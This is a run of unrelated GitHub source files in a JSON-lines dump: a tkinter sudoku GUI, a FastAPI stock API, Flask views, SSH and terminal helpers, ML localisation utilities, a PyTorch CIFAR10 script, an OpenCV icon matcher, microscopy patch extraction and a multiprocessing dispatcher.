Frame(root,height=3,width=60,bg=\"purple\")\ncoordFrame.pack()\nsecLable = Label(coordFrame,height=2,width=20,textvariable= section,fg=\"white\",bg=\"purple\").grid(row=0,column=0)\nrowLable = Label(coordFrame,height=2,width=20,textvariable= row,fg=\"white\",bg=\"purple\").grid(row=0,column=1)\ncolLable = Label(coordFrame,height=2,width=20,textvariable= col,fg=\"white\",bg=\"purple\").grid(row=0,column=2)\n\n#number button board\nnumFrame = Frame(root,height=3,width=60,bg=\"purple\")\nnumFrame.pack()\nfor i in range(1,11):\n if i != 10:\n numBtn =Button(numFrame,bd=5,width=5,height=3,text=str(i))\n numBtn.text = str(i)\n else:\n numBtn =Button(numFrame,bd=5,width=5,height=3,text=\"\")\n numBtn.text = \" \"\n numBtn.changable = True\n numBtn.config(command= lambda num = numBtn.text:setNum(num))\n numBtn.grid(row=0,column=i-1,padx=2,pady=2)\n\nfor s in range(len(sectionsBtns)):\n for r in range(len(sectionsBtns[s])):\n for c in range(len(sectionsBtns[s][r])):\n sectionsBtns[s][r][c].config(text=sectionsNums[s][r][c])\n\noutFrame = Frame(root,height=3,width=60,bg = \"purple\")\noutFrame.pack()\noutDisplay = Label(bg = \"purple\",textvariable= out,justify = \"center\")\noutDisplay.pack()\n\ncheckFrame = Frame(root,height=3,width=60,bg = \"purple\")\ncheckFrame.pack()\ncheckBtn = Button(checkFrame,bd=5,width=11,height=5,text=\"Check\", command = check)\ncheckBtn.grid(row = 0,column= 0,padx=10)\nsolveBtn = Button(checkFrame,bd=5,width=11,height=5,text=\"Solve\", command = solvePuzzle)\nsolveBtn.grid(row = 0,column= 1,padx=10)\ngenBtn = Button(checkFrame,bd=5,width=11,height=5,text=\"New Puzzle\", command = newPuzzle)\ngenBtn.grid(row = 0,column= 2,padx=10)\nclearBtn = Button(checkFrame,bd=5,width=11,height=5,text=\"Clear\", command = clearBoard)\nclearBtn.grid(row = 0,column= 3,padx=10)\nroot.mainloop()","repo_name":"Koeh1124/portfolioRepo","sub_path":"python/sudoku solver/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14021749220","text":"from fastapi import FastAPI, HTTPException\nfrom pydantic import BaseModel\nimport json\n\nclass Product(BaseModel):\n id: int\n name: str\n price: float\n quantity: int\n\ndescription = \"\"\"\nBackendAyres API te ajuda a gerenciar melhor seu estoque. 
🚀\n\n## Itens\n\nVocê poderá:\n\n* **Criar itens**.\n* **Atualizar itens**.\n* **Deletar itens**.\n* **Puxar itens**.\n\"\"\"\n\napp = FastAPI(\n title=\"BackendAyres\",\n description=description,\n version=\"0.0.1\",\n contact={\n \"name\": \"Raphael Lahiry e Rodrigo Coelho\",\n },\n license_info={\n \"name\": \"Apache 2.0\",\n \"url\": \"https://www.apache.org/licenses/LICENSE-2.0.html\",\n },\n)\n\ntags_metadata = [\n {\n \"name\": \"Get products\",\n \"description\": \"Listagem de todos os produtos em estoque\",\n },\n {\n \"name\": \"Get product\",\n \"description\": \"Lista produto específico do estoque\",\n },\n {\n \"name\": \"Create product\",\n \"description\": \"Cria um produto no estoque\",\n },\n {\n \"name\": \"Delete product\",\n \"description\": \"Deleta um produto do estoque\",\n },\n {\n \"name\": \"Update product\",\n \"description\": \"Atualiza um produto no estoque\",\n },\n]\n\n# Auxiliar functions\n\ndef verify_restrictions(product: Product, verify_product_exists: bool = True):\n with open('stock.json', 'r') as f:\n products = json.load(f)['products']\n\n if product.id < 0:\n raise HTTPException(status_code=400, detail=\"Id cannot be negative\")\n\n if product.quantity < 0:\n raise HTTPException(status_code=400, detail=\"Quantity cannot be negative\")\n\n if product.price < 0:\n raise HTTPException(status_code=400, detail=\"Price cannot be negative\")\n\n if verify_product_exists:\n if product.id in [product[\"id\"] for product in products] or product.name in [product[\"name\"] for product in products]:\n raise HTTPException(status_code=400, detail=\"Product already exists\")\n\n if product.name == \"\":\n raise HTTPException(status_code=400, detail=\"Name cannot be empty\")\n\ndef save_product(product: Product):\n with open('stock.json', 'r') as f:\n products = json.load(f)['products']\n\n products.append(product.dict())\n with open('stock.json', 'w') as f:\n json.dump({\"products\": products}, f, separators=(',',': '), indent=4)\n\n\n# Routes\n\n@app.get(\"/products\", tags=[\"Get products\"], summary=\"Listagem de todos os produtos em estoque\")\nasync def get_products():\n with open('stock.json', 'r') as f:\n products = json.load(f)['products']\n return products\n\n@app.get(\"/product/{id_product}\", tags=[\"Get product\"], summary=\"Lista produto específico do estoque\")\nasync def get_product(id_product: int):\n with open('stock.json', 'r') as f:\n products = json.load(f)['products']\n\n for product in products:\n if product[\"id\"] == id_product:\n return product\n raise HTTPException(status_code=404, detail=\"Product not found\")\n\n@app.post(\"/product\", tags=[\"Create product\"], summary=\"Cria um produto no estoque\")\nasync def create_product(product: Product):\n\n verify_restrictions(product)\n save_product(product)\n\n return \"Product created successfully\"\n\n@app.patch(\"/product\", tags=[\"Update product\"], summary=\"Atualiza um produto no estoque\")\nasync def update_product(product: Product):\n with open('stock.json', 'r') as f:\n products = json.load(f)['products']\n\n verify_restrictions(product, False)\n\n update_product = product.dict()\n\n for stock_product in products:\n if stock_product[\"id\"] == update_product[\"id\"]:\n stock_product[\"name\"] = update_product[\"name\"]\n stock_product[\"price\"] = update_product[\"price\"]\n stock_product[\"quantity\"] = update_product[\"quantity\"]\n break\n\n with open('stock.json', 'w') as f:\n json.dump({\"products\": products}, f, separators=(',',': '), indent=4)\n\n return \"Product updated 
successfully\"\n\n@app.delete(\"/product/{id_product}\", tags=[\"Delete product\"], summary=\"Deleta um produto do estoque\")\nasync def delete_product(id_product: int):\n with open('stock.json', 'r') as f:\n products = json.load(f)['products']\n\n if id_product < 0:\n raise HTTPException(status_code=400, detail=\"Id cannot be negative\")\n\n if id_product not in [product[\"id\"] for product in products]:\n raise HTTPException(status_code=400, detail=\"Product doens't exists\")\n\n filtered_products = [product for product in products if product['id'] != id_product]\n print(filtered_products)\n\n with open('stock.json', 'w') as f:\n json.dump({\"products\": filtered_products}, f, separators=(',',': '), indent=4)\n \n return \"Product deleted successfully\"","repo_name":"Lahiry/Projeto_MegaDados","sub_path":"Fase_01/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20894997814","text":"from flask import request\nfrom flask_restx import Resource, Namespace\n\nfrom app.container import genre_service\nfrom app.dao.models.genre import GenreSchema\nfrom decorators import auth_required, admin_required\n\n\ngenres_ns = Namespace('genres')\n\ngenre_schema = GenreSchema()\ngenres_schema = GenreSchema(many=True)\n\n\n@genres_ns.route('/')\nclass GenresView(Resource):\n @auth_required\n def get(self):\n all_genres = genre_service.get_all()\n return genres_schema.dump(all_genres), 200\n\n @admin_required\n def post(self):\n request_json = request.json\n\n genre_service.create(request_json)\n\n return \"New genre successfully added.\", 201\n\n\n@genres_ns.route('/')\nclass GenreView(Resource):\n @auth_required\n def get(self, id):\n genre = genre_service.get_one(id)\n return genre_schema.dump(genre), 200\n\n @admin_required\n def put(self, id):\n request_json = request.json\n request_json[\"id\"] = id\n\n genre_service.update(request_json)\n\n return \"Genre updated successfully.\", 204\n\n @admin_required\n def delete(self, id):\n genre_service.delete(id)\n\n return \"Genre deleted successfully\", 204\n","repo_name":"SeekersDream1901/Homework_19-hard_level-","sub_path":"app/views/genres.py","file_name":"genres.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17042880153","text":"'''\nCreated on Dec 28, 2021\n\n@author: vladyslav_goncharuk\n'''\n\nimport os\nimport io\nimport sys\nimport fcntl\nimport struct\nimport termios\nimport glob\nimport imp\n\ndef has_fileno(stream):\n \"\"\"\n Cleanly determine whether ``stream`` has a useful ``.fileno()``.\n .. note::\n This function helps determine if a given file-like object can be used\n with various terminal-oriented modules and functions such as `select`,\n `termios`, and `tty`. For most of those, a fileno is all that is\n required; they'll function even if ``stream.isatty()`` is ``False``.\n :param stream: A file-like object.\n :returns:\n ``True`` if ``stream.fileno()`` returns an integer, ``False`` otherwise\n (this includes when ``stream`` lacks a ``fileno`` method).\n .. versionadded:: 1.0\n \"\"\"\n try:\n return isinstance(stream.fileno(), int)\n except (AttributeError, io.UnsupportedOperation):\n return False\n\ndef isatty(stream):\n \"\"\"\n Cleanly determine whether ``stream`` is a TTY.\n Specifically, first try calling ``stream.isatty()``, and if that fails\n (e.g. 
due to lacking the method entirely) fallback to `os.isatty`.\n .. note::\n Most of the time, we don't actually care about true TTY-ness, but\n merely whether the stream seems to have a fileno (per `has_fileno`).\n However, in some cases (notably the use of `pty.fork` to present a\n local pseudoterminal) we need to tell if a given stream has a valid\n fileno but *isn't* tied to an actual terminal. Thus, this function.\n :param stream: A file-like object.\n :returns:\n A boolean depending on the result of calling ``.isatty()`` and/or\n `os.isatty`.\n .. versionadded:: 1.0\n \"\"\"\n # If there *is* an .isatty, ask it.\n if hasattr(stream, \"isatty\") and callable(stream.isatty):\n return stream.isatty()\n # If there wasn't, see if it has a fileno, and if so, ask os.isatty\n elif has_fileno(stream):\n return os.isatty(stream.fileno())\n # If we got here, none of the above worked, so it's reasonable to assume\n # the darn thing isn't a real TTY.\n return False\n\ndef bytes_to_read(input_):\n \"\"\"\n Query stream ``input_`` to see how many bytes may be readable.\n .. note::\n If we are unable to tell (e.g. if ``input_`` isn't a true file\n descriptor or isn't a valid TTY) we fall back to suggesting reading 1\n byte only.\n :param input: Input stream object (file-like).\n :returns: `int` number of bytes to read.\n .. versionadded:: 1.0\n \"\"\"\n # NOTE: we have to check both possibilities here; situations exist where\n # it's not a tty but has a fileno, or vice versa; neither is typically\n # going to work re: ioctl().\n if not os.name == 'nt' and isatty(input_) and has_fileno(input_):\n fionread = fcntl.ioctl(input_, termios.FIONREAD, \" \")\n return struct.unpack(\"h\", fionread)[0]\n return 1\n\ndef load_module(absolute_path):\n\n print(f\"Attempt to load module - {absolute_path}\")\n\n import importlib.util\n module_name, _ = os.path.splitext(os.path.split(absolute_path)[-1])\n try:\n py_mod = imp.load_source(module_name, absolute_path)\n except ImportError as e:\n if \"No module named\" not in e.msg:\n raise e\n\n missing_module = e.name\n module_root = os.path.dirname(absolute_path)\n\n if missing_module + \".py\" not in os.listdir(module_root):\n msg = \"Could not find '{}' in '{}'\"\n raise ImportError(msg.format(missing_module, module_root))\n\n print(\"Could not directly load module, including dir: {}\".format(module_root))\n spec = importlib.util.spec_from_file_location(module_name, absolute_path)\n py_mod = importlib.util.module_from_spec(spec)\n spec.loader.exec_module(py_mod)\n return module_name, py_mod\n\ndef load_all_modules_in_dir(module_root_dir):\n\n if not os.path.isdir(module_root_dir):\n raise Exception(f\"Provided path '{module_root_dir}' is not a directory!\")\n\n sys.path.insert(0, module_root_dir)\n\n found_python_files = glob.glob(f\"{module_root_dir}/*.py\")\n\n result = {}\n\n for found_python_file in found_python_files:\n if os.path.isfile(found_python_file) and not found_python_file.endswith('__init__.py'):\n loaded_module_name, loaded_module = load_module(found_python_file)\n\n if loaded_module:\n result[loaded_module_name] = loaded_module\n\n for file in os.listdir(module_root_dir):\n d = os.path.join(module_root_dir, file)\n if os.path.isdir(d) and d != os.path.join(module_root_dir, \"__pycache__\"):\n result.update(load_all_modules_in_dir(d))\n\n return result\n\ndef load_all_modules_in_dirs(module_paths):\n result = {}\n for module_path in module_paths:\n result.update(load_all_modules_in_dir(module_path))\n return result\n\ndef 
create_class_instance(full_class_name, loaded_modules):\n _, module_name, class_name = full_class_name.rsplit('.', 2)\n module = loaded_modules.get(module_name)\n\n result = None\n\n if module:\n result = getattr(module, class_name)\n else:\n raise Exception(f\"Module '{module_name}' is not loaded.\")\n\n return result\n\ndef get_terminal_dimensions():\n if isatty(sys.stdout):\n s = struct.pack('HHHH', 0, 0, 0, 0)\n t = fcntl.ioctl(sys.stdout.fileno(), termios.TIOCGWINSZ, s)\n winsize = struct.unpack('hhhh', t)\n return winsize[1], winsize[0]\n else:\n return None, None\n\ndef exec_command(\n paramiko_ssh_client,\n command,\n bufsize=-1,\n timeout=None,\n environment=None,\n terminal_width = 80,\n terminal_height = 24\n ):\n chan = paramiko_ssh_client._transport.open_session(timeout=timeout)\n if isatty(sys.stdout):\n chan.get_pty(width=terminal_width, height=terminal_height)\n chan.settimeout(timeout)\n if environment:\n chan.update_environment(environment)\n chan.exec_command(command)\n stdin = chan.makefile_stdin(\"wb\", bufsize)\n stdout = chan.makefile(\"r\", bufsize)\n stderr = chan.makefile_stderr(\"r\", bufsize)\n return stdin, stdout, stderr","repo_name":"svlad-90/paf","sub_path":"paf/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":6193,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"25308574878","text":"import heapq\nimport itertools\nfrom collections import defaultdict\n\nimport pandas as pd\nimport numpy as np\nimport plotly.express as px\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nfrom sklearn.multioutput import MultiOutputRegressor\nfrom utils.theoretical_approximation import cartesian_cross_product\n\n\ndef get_samples_by_points_num(df, points):\n grouped = df.groupby([\"Point\"])\n ret_df = grouped.get_group(points[0])\n for i in points[1:]:\n ret_df = ret_df.append(grouped.get_group(i))\n ret_df.reset_index(drop=True)\n return ret_df\n\n\ndef split_data(df, points_num, train_part, validation_part, test_part):\n assert train_part + validation_part + test_part == 1\n division = (np.array(\n points_num*np.array([train_part, validation_part, test_part]))).astype(int)\n assert np.sum(division) == points_num\n for i in range(1, len(division)):\n division[i] += division[i-1]\n division = division[:-1]\n\n return itertools.chain.from_iterable(\n map(lambda data: (data.drop(columns=[\"Point\", \"Square\", \"Orientation\"]), data[\"Square\"]),\n map(lambda points: get_samples_by_points_num(df, points),\n np.split(np.random.permutation(np.arange(points_num)), division))))\n\n\ndef split_data_regression(df, points_num, train_part, validation_part, test_part):\n assert train_part + validation_part + test_part == 1\n division = (np.array(\n points_num*np.array([train_part, validation_part, test_part]))).astype(int)\n assert np.sum(division) == points_num\n for i in range(1, len(division)):\n division[i] += division[i-1]\n division = division[:-1]\n\n return itertools.chain.from_iterable(\n map(lambda data: (data.drop(columns=[\"Point\", \"Square\", \"Orientation\", \"x\", \"y\"]), data[[\"x\", \"y\"]]),\n map(lambda points: get_samples_by_points_num(df, points),\n np.split(np.random.permutation(np.arange(points_num)), division))))\n\n\ndef split_data_regression_cv(df, points_num, n_splits):\n division = np.split(np.random.permutation(np.arange(points_num)), n_splits)\n\n for i in range(len(division)):\n train = np.hstack(division[:i] + division[i+1:])\n test = division[i]\n yield 
itertools.chain.from_iterable(\n map(lambda data: (data.drop(columns=[\"Point\", \"Square\", \"Orientation\", \"x\", \"y\"]), data[[\"x\", \"y\"]]),\n map(lambda points: get_samples_by_points_num(df, points), [train, test])))\n\n\ndef show_scores(model,X_test,Y_test):\n predicted = model.predict(X_test)\n print(\"Number of mislabeled points out of a total %d points : %d\"% (X_test.shape[0], (Y_test != predicted).sum()))\n probabilities = model.predict_proba(X_test)\n selected = []\n for i in probabilities:\n d = dict()\n for x,y in enumerate(i):\n d[x]=y\n selected.append(d)\n topFive = [heapq.nlargest(5,d,key=d.get)for d in selected]\n failed = 0\n for x,y in enumerate(topFive):\n if Y_test.iloc[x] not in y:\n failed+=1\n print(\"Number of points not in top 5 predicted probabilities total points: %d; failed: %d\"% (X_test.shape[0], failed))\n\n\ndef visualize_errors(model, X_train, y_train, X_test, y_test):\n predicted = model.predict(X_test)\n\n X_train[\"Square\"] = y_train.apply(str)\n X_test[\"Square\"] = y_test.apply(str)\n\n X_train[\"correct_predict\"] = y_train.apply(lambda x: \"train\")\n X_test[\"correct_predict\"] = (y_test == predicted)\n df_tmp = pd.concat([X_train, X_test], ignore_index=True )\n # Plotly visualization\n fig = px.scatter_3d(df_tmp, x=\"Server-RSSI-1\",\n y=\"Server-RSSI-2\",\n z=\"Server-RSSI-3\",\n color=\"Square\",\n symbol='correct_predict')\n fig = fig.update_traces(marker=dict(size=8,\n line=dict(width=1,\n color='DarkSlateGrey')),\n selector=dict(mode='markers'))\n fig.show()\n X_train.drop([\"correct_predict\", \"Square\"], axis=1, inplace=True)\n X_test.drop([\"correct_predict\", \"Square\"], axis=1, inplace=True)\n\n\ndef show_scores_per_point(model, X_test, y_test):\n predicted = model.predict(X_test)\n results = defaultdict(int)\n for i in range(X_test.shape[0]):\n results[y_test.iloc[i]] += y_test.iloc[i] != predicted[i]\n\n print(\"Accuracy of classifier for each square: \", end=\"\")\n for sq in range(len(results)):\n if sq % 3 == 0:\n print()\n print(\"%.2f\" % (1-results[sq]/y_test.groupby(y_test).get_group(sq).shape), end=\" \")\n print()\n\n\ndef calc_mean_df(df, merge_points_num=10):\n mean_df = pd.DataFrame(columns=df.columns)\n\n grouped_by_square = df.groupby([\"Square\"])\n for square_group in grouped_by_square.groups:\n grouped_by_point = grouped_by_square.get_group(square_group).groupby([\"Point\"])\n for point_group in grouped_by_point.groups:\n point = grouped_by_point.get_group(point_group)\n mean_df = mean_df.append(pd.DataFrame(\n np.mean(np.array([point.iloc[range(0, len(point), int(len(point)/merge_points_num))].values\n for i in range(merge_points_num)]), axis=0),\n columns=mean_df.columns))\n mean_df.reset_index(drop=True)\n return mean_df\n\n\ndef add_coordinates(df):\n square_to_top_left_corner_map = {\n \"s0\": (0, 400), \"s1\": (100, 400), \"s2\": (200, 400),\n \"s3\": (0, 300), \"s4\": (100, 300), \"s5\": (200, 300),\n \"s6\": (0, 200), \"s7\": (100, 200), \"s8\": (200, 200),\n \"s9\": (0, 100), \"s10\": (100, 100),\"s11\": (200, 100)\n }\n\n point_to_coord_map = {0: (20, -20), 1: (50, -20), 2: (80, -20),\n 7: (40, -50), 8: (50, -50), 9: (54, -50), 3: (80, -50),\n 6: (40, -80), 5: (50, -80), 4: (80, -80)\n }\n\n df[[\"x\", \"y\"]] = pd.DataFrame(df[\"Square\"].map(square_to_top_left_corner_map).to_list(), columns=[\"x\", \"y\"])\n\n df[\"x\"] = df[\"x\"] + df[\"Point\"].apply(lambda x: point_to_coord_map[x//4][0])\n df[\"y\"] = df[\"y\"] + df[\"Point\"].apply(lambda x: point_to_coord_map[x//4][1])\n return df\n\n\ndef 
draw_regression_accuracy(df, points_num, x_len, y_len, cv_n_split, base_model, params):\n    res = pd.DataFrame(columns=[\"x\", \"y\", \"accuracy\"])\n    for X_train, y_train, X_test, y_test in split_data_regression_cv(df, points_num, cv_n_split):\n        model = MultiOutputRegressor(base_model(**params))\n        model.fit(X_train, y_train)\n        predicted = model.predict(X_test)\n        res = pd.concat([res, pd.DataFrame({\"x\": y_test[\"x\"].values, \"y\": y_test[\"y\"].values, \"accuracy\": np.apply_along_axis(lambda x: (x[0]**2 + x[1]**2)**0.5, 1, np.abs(predicted - y_test))})])\n\n    mean_res = res.groupby([\"x\", \"y\"]).mean().reset_index()\n\n    coords = mean_res[[\"x\", \"y\"]].values\n\n    field = np.zeros((y_len,x_len))\n    for p in cartesian_cross_product(np.arange(field.shape[1]), np.arange(field.shape[0])):\n        field[p[1], p[0]] = mean_res.iloc[np.apply_along_axis(lambda x: (x[0]**2 + x[1]**2)**0.5, 1, np.abs(coords - p)).argmin(), 2]\n\n    field = np.flip(field, 0)\n    fig, ax = plt.subplots(figsize=(10,10))\n    sns.heatmap(field, ax=ax, xticklabels=False,yticklabels=False,cmap=\"coolwarm_r\")\n","repo_name":"Midren/Localization","sub_path":"notebooks/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16420976276","text":"import torch.nn as nn\nimport torch\nfrom torch.utils.data import DataLoader\nfrom torchvision.datasets import CIFAR10\nfrom torchvision import transforms\n\ndatasets = CIFAR10(\n    root=r'cifar',\n    train=False,\n    transform=transforms.ToTensor(),\n    download=True,\n)\n\ndataloader = DataLoader(datasets, batch_size=64)\n\n\nclass Model(nn.Module):\n    def __init__(self):\n        super(Model, self).__init__()\n        self.seqls1 = nn.Sequential(\n            nn.Conv2d(in_channels=3, out_channels=32, kernel_size=5, padding=2, stride=1),\n            nn.MaxPool2d(kernel_size=2),\n            nn.Conv2d(in_channels=32, out_channels=32, kernel_size=5, stride=1, padding=2),\n            nn.MaxPool2d(kernel_size=2),\n            nn.Conv2d(in_channels=32, out_channels=64, kernel_size=5, stride=1, padding=2),\n            nn.MaxPool2d(kernel_size=2),\n            nn.Flatten(),\n            nn.Linear(1024, 64),\n            nn.Linear(64, 10)\n        )\n\n    def forward(self, x):\n        x = self.seqls1(x)\n        return x\n\n\nmodel = Model()\n\n# test code\n# tensor = torch.ones([1, 3, 32, 32], dtype=torch.float)\n# print(model(tensor).shape)\n\noptim = torch.optim.SGD(model.parameters(), lr=0.05)\nloss_fn = nn.CrossEntropyLoss()\nfor epoch in range(10):\n    running_loss = 0.0\n    for idx, (imgs, targets) in enumerate(dataloader):\n        output = model(imgs)\n        loss = loss_fn(output, targets)\n        optim.zero_grad()\n        loss.backward()\n        optim.step()\n        running_loss += loss.item()  # use .item() so the autograd graph is not kept alive across iterations\n    print(running_loss)\n","repo_name":"fl0w2Bloom/note","sub_path":"torch/nn_optim.py","file_name":"nn_optim.py","file_ext":"py","file_size_in_byte":1507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10821208745","text":"import cv2\nimport numpy as np\n\n# status effects above character center point : 780,607\n# status effects top left : 738,597\n# status effects bottom right : 822,616\n\n# in paint, the coordinates are displayed as cols, rows\n\ndef find_confuse_status(img, tpl):\n    \n    # roi_status_effect_rows = slice(597,616)\n    # roi_status_effect_cols = slice(738,822)\n\n    # roi_status_effect = img[roi_status_effect_rows, roi_status_effect_cols]\n    # cv2.imshow('Status effect area', roi_status_effect)\n    \n    # im = np.atleast_3d(roi_status_effect)\n    \n    im = np.atleast_3d(img)\n    tpl = 
np.atleast_3d(tpl)\n H, W, D = im.shape[:3]\n h, w = tpl.shape[:2]\n\n # Integral image and template sum per channel\n sat = im.cumsum(1).cumsum(0)\n tplsum = np.array([tpl[:, :, i].sum() for i in range(D)])\n\n # Calculate lookup table for all the possible windows\n iA, iB, iC, iD = sat[:-h, :-w], sat[:-h, w:], sat[h:, :-w], sat[h:, w:] \n lookup = iD - iB - iC + iA\n # Possible matches\n possible_match = np.where(np.logical_and.reduce([lookup[..., i] == tplsum[i] for i in range(D)]))\n\n # Find exact match\n for y, x in zip(*possible_match):\n if np.all(im[y+1:y+h+1, x+1:x+w+1] == tpl):\n return (y+1, x+1)\n\n # raise Exception(\"Image not found\")\n return None\n \ndef main():\n im = cv2.imread('./confuse_img_2.png')\n template = cv2.imread('./confuse_icon.png')\n\n print(find_confuse_status(im, template))\n \nif __name__ == '__main__':\n main()","repo_name":"SwatSid/rotmg_scripts","sub_path":"confuse_detect.py","file_name":"confuse_detect.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25119026632","text":"import numpy as np\nimport os\nimport logging\nimport matplotlib\nimport pandas as pd\n\nfrom plot.plotting import save_single_cell_im\nfrom utils.config_reader import YamlReader\n\nmatplotlib.use('AGG')\nfrom utils.patch_utils import check_segmentation_dim, select_window\n\nlog = logging.getLogger('dynacontrast.log')\n\ndef get_patches_mp(raw_folder: str,\n supp_folder: str,\n sites: list,\n config: YamlReader,\n **kwargs):\n \"\"\" Helper function for patch extraction\n\n Wrapper method `get_patches` will be called, which\n extracts individual cells from static frames for each site.\n\n Results will be saved in the supplementary data folder, including:\n \"stacks_*.pkl\": single cell patches for each time slice\n\n Args:\n raw_folder (str): folder for raw data, segmentation and\n summarized results\n supp_folder (str): folder for supplementary data\n sites (list of str): list of site names\n config (YamlReader): config file supplied at CLI\n \"\"\"\n channels = config.preprocess.channels\n crop_size = config.preprocess.crop_size\n save_fig = config.preprocess.save_fig\n skip_boundary = config.preprocess.skip_boundary\n\n for site in sites:\n site_path = os.path.join(raw_folder + '/' + site + '.npy')\n site_supp_files_folder = os.path.join(supp_folder, '%s-supps' % site[:2], '%s' % site)\n if not os.path.exists(site_path):\n print(\"Site data not found %s\" % site_path, flush=True)\n if not os.path.exists(site_supp_files_folder):\n print(\"Site supp folder not found %s\" % site_supp_files_folder, flush=True)\n meta_path = os.path.join(site_supp_files_folder, 'patch_meta.csv')\n if not os.path.isfile(meta_path): # skip position with no cells\n log.warning('No patch_meta.csv is found in {}. Skipping...'.format(site_supp_files_folder))\n # print('No cell is detected for position {}'.format(site))\n continue\n\n try:\n get_patches(site_path,\n site_supp_files_folder,\n crop_size=crop_size,\n channels=channels,\n save_fig=save_fig,\n skip_boundary=skip_boundary,\n **kwargs)\n except Exception as e:\n log.error('Extracting patches failed for {}. '.format(site_supp_files_folder))\n log.exception('')\n # print('Extracting patches failed for position {}. 
'.format(site))\n # raise e\n return\n\ndef get_patches(site_path,\n site_supp_files_folder,\n crop_size=256,\n channels=None,\n save_fig=False,\n skip_boundary=False,\n ):\n \"\"\" Wrapper method for patch extraction\n\n Supplementary files generated by `find_cells` will\n be loaded for each site, then individual cells from static frames will be\n extracted and saved.\n\n Results will be saved in supplementary data folder, including:\n \"stacks_*.pkl\": single cell patches for each time slice\n\n Args:\n site_path (str): path to image stack (.npy)\n site_segmentation_path (str): path to semantic segmentation stack (.npy)\n site_supp_files_folder (str): path to the folder where supplementary \n files will be saved\n crop_size (int, optional): default=256, x, y size of the patch\n channels (list, optional): channels to extract patches. Default is all the channels\n save_fig (bool, optional): if to save extracted patches (with\n segmentation mask)\n reload (bool, optional): if to load existing stack dat files\n skip_boundary (bool, optional): if to skip patches whose edges exceed\n the image size (do not pad)\n\n \"\"\"\n\n # Load data\n image_stack = np.load(site_path)\n meta_path = os.path.join(site_supp_files_folder, 'patch_meta.csv')\n df_meta = pd.read_csv(meta_path, index_col=0, converters={\n 'cell position': lambda x: np.fromstring(x.strip(\"[]\"), sep=' ', dtype=np.int32)})\n n_z = 1\n if image_stack.ndim == 5:\n n_frames, n_channels, n_z, x_full_size, y_full_size = image_stack.shape\n elif image_stack.ndim == 4:\n n_frames, n_channels, x_full_size, y_full_size = image_stack.shape\n image_stack = np.expand_dims(image_stack, axis=2)\n else:\n raise ValueError('Input image must be 4 or 5D, not {}'.format(image_stack.ndim))\n if channels is None:\n channels = list(range(n_channels))\n image_stack = image_stack[:, channels, ...]\n for t_point in range(n_frames):\n for z in range(n_z):\n # print(\"processing timepoint {} z {}\".format(t_point, z))\n stack_dat_path = os.path.join(site_supp_files_folder, 'patches_t{}_z{}.npy'.format(t_point, z))\n # print('Writing timepoint {} z {}'.format(t_point, z))\n raw_image = image_stack[t_point, :, z, ...]\n df_meta_tz = df_meta.loc[(df_meta['time'] == t_point) & (df_meta['slice'] == z), :]\n all_cells = df_meta_tz.loc[:, ['cell ID', 'cell position']].to_numpy()\n # Save all cells in this step, filtering will be performed during analysis\n cell_patches = []\n for cell_id, cell_position in all_cells:\n # print(\"cell_id : {}, cell position: {}\".format(cell_id, cell_position))\n # Define window based on cell center and extract mask\n window = [(cell_position[0]- crop_size//2, cell_position[0]+ crop_size//2),\n (cell_position[1]- crop_size//2, cell_position[1]+ crop_size//2)]\n cell_patch = select_window(raw_image, window, padding=0, skip_boundary=skip_boundary)\n if cell_patch is None:\n # drop cell that did not get patched\n df_meta.drop(df_meta[(df_meta['cell ID'] == cell_id) &\n (df_meta['time'] == t_point) &\n (df_meta['slice'] == z)].index, inplace=True)\n else:\n cell_patches.append(cell_patch)\n if save_fig:\n im_path = os.path.join(site_supp_files_folder, 'patch_t{}_z{}_cell{}'.format(t_point, z, cell_id))\n save_single_cell_im(cell_patch, im_path)\n if cell_patches:\n cell_patches = np.stack(cell_patches)\n with open(stack_dat_path, 'wb') as f:\n # print(f\"save patches to {stack_dat_path}\")\n np.save(f, cell_patches)\n df_meta.reset_index(drop=True, inplace=True)\n df_meta.to_csv(meta_path, 
sep=',')\n\n\n","repo_name":"mehta-lab/dynacontrast","sub_path":"preprocess/extract_patches.py","file_name":"extract_patches.py","file_ext":"py","file_size_in_byte":6776,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"17703299271","text":"\"\"\"\n\"\"\"\n\n__author__ = \"Xun Li \"\n__all__ = ['MultiCoreProxy']\n\nimport os\nimport sys\nimport math\nimport time\nimport types\nfrom multiprocessing import *\n\nclass TaskProcessor:\n    \"\"\"\n    The TaskProcessor class provides the functions necessary to process each task.\n    \"\"\"\n    def __init__(self, numcalcs):\n        \"\"\"\n        Initialise the TaskProcessor.\n        \"\"\"\n        self.numcalcs = numcalcs\n    \n    def calculate(self, angle_deg):\n        \"\"\"\n        Calculate the result of a task.\n        \"\"\"\n        result = 0\n        for i in range(self.numcalcs):\n            angle_rad = math.radians(angle_deg)\n            result += math.tanh(angle_rad)/math.cosh(angle_rad)/self.numcalcs\n        return ( angle_deg, result )\n    \nclass ObjectDispatcher:\n    \"\"\"\n    The ObjectDispatcher class manages the task and result queues.\n    \"\"\"\n    def __init__(self):\n        \"\"\"\n        Initialise the ObjectDispatcher.\n        \"\"\"\n        self.taskQueue = Queue()\n        self.resultQueue = Queue()\n    \n    def putTask(self, task):\n        \"\"\"\n        Put a task on the task queue.\n        \"\"\"\n        self.taskQueue.put(task)\n    \n    def getTask(self):\n        \"\"\"\n        Get a task from the task queue.\n        \"\"\"\n        return self.taskQueue.get()\n    \n    def putResult(self, output):\n        \"\"\"\n        Put a result on the result 